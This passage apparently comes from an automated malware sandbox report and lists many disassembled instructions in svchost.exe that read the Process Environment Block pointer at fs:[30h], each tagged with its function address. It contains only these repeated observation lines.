            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBA4B0 mov eax, dword ptr fs:[00000030h]1_2_02FBA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F364AB mov eax, dword ptr fs:[00000030h]1_2_02F364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEA49A mov eax, dword ptr fs:[00000030h]1_2_02FEA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5A470 mov eax, dword ptr fs:[00000030h]1_2_02F5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5A470 mov eax, dword ptr fs:[00000030h]1_2_02F5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5A470 mov eax, dword ptr fs:[00000030h]1_2_02F5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBC460 mov ecx, dword ptr fs:[00000030h]1_2_02FBC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEA456 mov eax, dword ptr fs:[00000030h]1_2_02FEA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2645D mov eax, dword ptr fs:[00000030h]1_2_02F2645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5245A mov eax, dword ptr fs:[00000030h]1_2_02F5245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h]1_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h]1_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h]1_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h]1_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h]1_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h]1_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h]1_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h]1_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2E420 mov eax, dword ptr fs:[00000030h]1_2_02F2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2E420 mov eax, dword ptr fs:[00000030h]1_2_02F2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2E420 mov eax, dword ptr fs:[00000030h]1_2_02F2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2C427 mov eax, dword ptr fs:[00000030h]1_2_02F2C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB6420 mov eax, dword ptr fs:[00000030h]1_2_02FB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB6420 mov eax, dword ptr fs:[00000030h]1_2_02FB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB6420 mov eax, dword ptr fs:[00000030h]1_2_02FB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB6420 mov eax, dword ptr fs:[00000030h]1_2_02FB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB6420 mov eax, dword ptr fs:[00000030h]1_2_02FB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB6420 mov eax, dword ptr fs:[00000030h]1_2_02FB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB6420 mov eax, dword ptr fs:[00000030h]1_2_02FB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F68402 mov eax, dword ptr fs:[00000030h]1_2_02F68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F68402 mov eax, dword ptr fs:[00000030h]1_2_02F68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F68402 mov eax, dword ptr fs:[00000030h]1_2_02F68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F325E0 mov eax, dword ptr fs:[00000030h]1_2_02F325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C5ED mov eax, dword ptr fs:[00000030h]1_2_02F6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C5ED mov eax, dword ptr fs:[00000030h]1_2_02F6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F365D0 mov eax, dword ptr fs:[00000030h]1_2_02F365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A5D0 mov eax, dword ptr fs:[00000030h]1_2_02F6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A5D0 mov eax, dword ptr fs:[00000030h]1_2_02F6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E5CF mov eax, dword ptr fs:[00000030h]1_2_02F6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E5CF mov eax, dword ptr fs:[00000030h]1_2_02F6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F545B1 mov eax, dword ptr fs:[00000030h]1_2_02F545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F545B1 mov eax, dword ptr fs:[00000030h]1_2_02F545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB05A7 mov eax, dword ptr fs:[00000030h]1_2_02FB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB05A7 mov eax, dword ptr fs:[00000030h]1_2_02FB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB05A7 mov eax, dword ptr fs:[00000030h]1_2_02FB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E59C mov eax, dword ptr fs:[00000030h]1_2_02F6E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F32582 mov eax, dword ptr fs:[00000030h]1_2_02F32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F32582 mov ecx, dword ptr fs:[00000030h]1_2_02F32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F64588 mov eax, dword ptr fs:[00000030h]1_2_02F64588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6656A mov eax, dword ptr fs:[00000030h]1_2_02F6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6656A mov eax, dword ptr fs:[00000030h]1_2_02F6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6656A mov eax, dword ptr fs:[00000030h]1_2_02F6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38550 mov eax, dword ptr fs:[00000030h]1_2_02F38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38550 mov eax, dword ptr fs:[00000030h]1_2_02F38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40535 mov eax, dword ptr fs:[00000030h]1_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40535 mov eax, dword ptr fs:[00000030h]1_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40535 mov eax, dword ptr fs:[00000030h]1_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40535 mov eax, dword ptr fs:[00000030h]1_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40535 mov eax, dword ptr fs:[00000030h]1_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40535 mov eax, dword ptr fs:[00000030h]1_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E53E mov eax, dword ptr fs:[00000030h]1_2_02F5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E53E mov eax, dword ptr fs:[00000030h]1_2_02F5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E53E mov eax, dword ptr fs:[00000030h]1_2_02F5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E53E mov eax, dword ptr fs:[00000030h]1_2_02F5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E53E mov eax, dword ptr fs:[00000030h]1_2_02F5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC6500 mov eax, dword ptr fs:[00000030h]1_2_02FC6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004B00 mov eax, dword ptr fs:[00000030h]1_2_03004B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6AAEE mov eax, dword ptr fs:[00000030h]1_2_02F6AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6AAEE mov eax, dword ptr fs:[00000030h]1_2_02F6AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30AD0 mov eax, dword ptr fs:[00000030h]1_2_02F30AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F64AD0 mov eax, dword ptr fs:[00000030h]1_2_02F64AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F64AD0 mov eax, dword ptr fs:[00000030h]1_2_02F64AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F86ACC mov eax, dword ptr fs:[00000030h]1_2_02F86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F86ACC mov eax, dword ptr fs:[00000030h]1_2_02F86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F86ACC mov eax, dword ptr fs:[00000030h]1_2_02F86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38AA0 mov eax, dword ptr fs:[00000030h]1_2_02F38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38AA0 mov eax, dword ptr fs:[00000030h]1_2_02F38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03002B57 mov eax, dword ptr fs:[00000030h]1_2_03002B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03002B57 mov eax, dword ptr fs:[00000030h]1_2_03002B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03002B57 mov eax, dword ptr fs:[00000030h]1_2_03002B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03002B57 mov eax, dword ptr fs:[00000030h]1_2_03002B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F86AA4 mov eax, dword ptr fs:[00000030h]1_2_02F86AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F68A90 mov edx, dword ptr fs:[00000030h]1_2_02F68A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FACA72 mov eax, dword ptr fs:[00000030h]1_2_02FACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FACA72 mov eax, dword ptr fs:[00000030h]1_2_02FACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6CA6F mov eax, dword ptr fs:[00000030h]1_2_02F6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6CA6F mov eax, dword ptr fs:[00000030h]1_2_02F6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6CA6F mov eax, dword ptr fs:[00000030h]1_2_02F6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDEA60 mov eax, dword ptr fs:[00000030h]1_2_02FDEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h]1_2_02F36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h]1_2_02F36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h]1_2_02F36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h]1_2_02F36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h]1_2_02F36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h]1_2_02F36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h]1_2_02F36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40A5B mov eax, dword ptr fs:[00000030h]1_2_02F40A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40A5B mov eax, dword ptr fs:[00000030h]1_2_02F40A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F54A35 mov eax, dword ptr fs:[00000030h]1_2_02F54A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F54A35 mov eax, dword ptr fs:[00000030h]1_2_02F54A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6CA24 mov eax, dword ptr fs:[00000030h]1_2_02F6CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5EA2E mov eax, dword ptr fs:[00000030h]1_2_02F5EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBCA11 mov eax, dword ptr fs:[00000030h]1_2_02FBCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38BF0 mov eax, dword ptr fs:[00000030h]1_2_02F38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38BF0 mov eax, dword ptr fs:[00000030h]1_2_02F38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38BF0 mov eax, dword ptr fs:[00000030h]1_2_02F38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5EBFC mov eax, dword ptr fs:[00000030h]1_2_02F5EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBCBF0 mov eax, dword ptr fs:[00000030h]1_2_02FBCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDEBD0 mov eax, dword ptr fs:[00000030h]1_2_02FDEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F50BCB mov eax, dword ptr fs:[00000030h]1_2_02F50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F50BCB mov eax, dword ptr fs:[00000030h]1_2_02F50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F50BCB mov eax, dword ptr fs:[00000030h]1_2_02F50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30BCD mov eax, dword ptr fs:[00000030h]1_2_02F30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30BCD mov eax, dword ptr fs:[00000030h]1_2_02F30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30BCD mov eax, dword ptr fs:[00000030h]1_2_02F30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40BBE mov eax, dword ptr fs:[00000030h]1_2_02F40BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40BBE mov eax, dword ptr fs:[00000030h]1_2_02F40BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE4BB0 mov eax, dword ptr fs:[00000030h]1_2_02FE4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE4BB0 mov eax, dword ptr fs:[00000030h]1_2_02FE4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004A80 mov eax, dword ptr fs:[00000030h]1_2_03004A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2CB7E mov eax, dword ptr fs:[00000030h]1_2_02F2CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F28B50 mov eax, dword ptr fs:[00000030h]1_2_02F28B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDEB50 mov eax, dword ptr fs:[00000030h]1_2_02FDEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE4B4B mov eax, dword ptr fs:[00000030h]1_2_02FE4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE4B4B mov eax, dword ptr fs:[00000030h]1_2_02FE4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC6B40 mov eax, dword ptr fs:[00000030h]1_2_02FC6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC6B40 mov eax, dword ptr fs:[00000030h]1_2_02FC6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFAB40 mov eax, dword ptr fs:[00000030h]1_2_02FFAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD8B42 mov eax, dword ptr fs:[00000030h]1_2_02FD8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5EB20 mov eax, dword ptr fs:[00000030h]1_2_02F5EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5EB20 mov eax, dword ptr fs:[00000030h]1_2_02F5EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF8B28 mov eax, dword ptr fs:[00000030h]1_2_02FF8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF8B28 mov eax, dword ptr fs:[00000030h]1_2_02FF8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C8F9 mov eax, dword ptr fs:[00000030h]1_2_02F6C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C8F9 mov eax, dword ptr fs:[00000030h]1_2_02F6C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFA8E4 mov eax, dword ptr fs:[00000030h]1_2_02FFA8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E8C0 mov eax, dword ptr fs:[00000030h]1_2_02F5E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004940 mov eax, dword ptr fs:[00000030h]1_2_03004940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBC89D mov eax, dword ptr fs:[00000030h]1_2_02FBC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30887 mov eax, dword ptr fs:[00000030h]1_2_02F30887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBE872 mov eax, dword ptr fs:[00000030h]1_2_02FBE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBE872 mov eax, dword ptr fs:[00000030h]1_2_02FBE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC6870 mov eax, dword ptr fs:[00000030h]1_2_02FC6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC6870 mov eax, dword ptr fs:[00000030h]1_2_02FC6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F60854 mov eax, dword ptr fs:[00000030h]1_2_02F60854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F34859 mov eax, dword ptr fs:[00000030h]1_2_02F34859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F34859 mov eax, dword ptr fs:[00000030h]1_2_02F34859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F42840 mov ecx, dword ptr fs:[00000030h]1_2_02F42840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F52835 mov eax, dword ptr fs:[00000030h]1_2_02F52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F52835 mov eax, dword ptr fs:[00000030h]1_2_02F52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F52835 mov eax, dword ptr fs:[00000030h]1_2_02F52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F52835 mov ecx, dword ptr fs:[00000030h]1_2_02F52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F52835 mov eax, dword ptr fs:[00000030h]1_2_02F52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F52835 mov eax, dword ptr fs:[00000030h]1_2_02F52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A830 mov eax, dword ptr fs:[00000030h]1_2_02F6A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD483A mov eax, dword ptr fs:[00000030h]1_2_02FD483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD483A mov eax, dword ptr fs:[00000030h]1_2_02FD483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBC810 mov eax, dword ptr fs:[00000030h]1_2_02FBC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F629F9 mov eax, dword ptr fs:[00000030h]1_2_02F629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F629F9 mov eax, dword ptr fs:[00000030h]1_2_02F629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBE9E0 mov eax, dword ptr fs:[00000030h]1_2_02FBE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02F3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02F3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02F3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02F3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02F3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02F3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F649D0 mov eax, dword ptr fs:[00000030h]1_2_02F649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFA9D3 mov eax, dword ptr fs:[00000030h]1_2_02FFA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC69C0 mov eax, dword ptr fs:[00000030h]1_2_02FC69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB89B3 mov esi, dword ptr fs:[00000030h]1_2_02FB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB89B3 mov eax, dword ptr fs:[00000030h]1_2_02FB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB89B3 mov eax, dword ptr fs:[00000030h]1_2_02FB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F309AD mov eax, dword ptr fs:[00000030h]1_2_02F309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F309AD mov eax, dword ptr fs:[00000030h]1_2_02F309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD4978 mov eax, dword ptr fs:[00000030h]1_2_02FD4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD4978 mov eax, dword ptr fs:[00000030h]1_2_02FD4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBC97C mov eax, dword ptr fs:[00000030h]1_2_02FBC97C
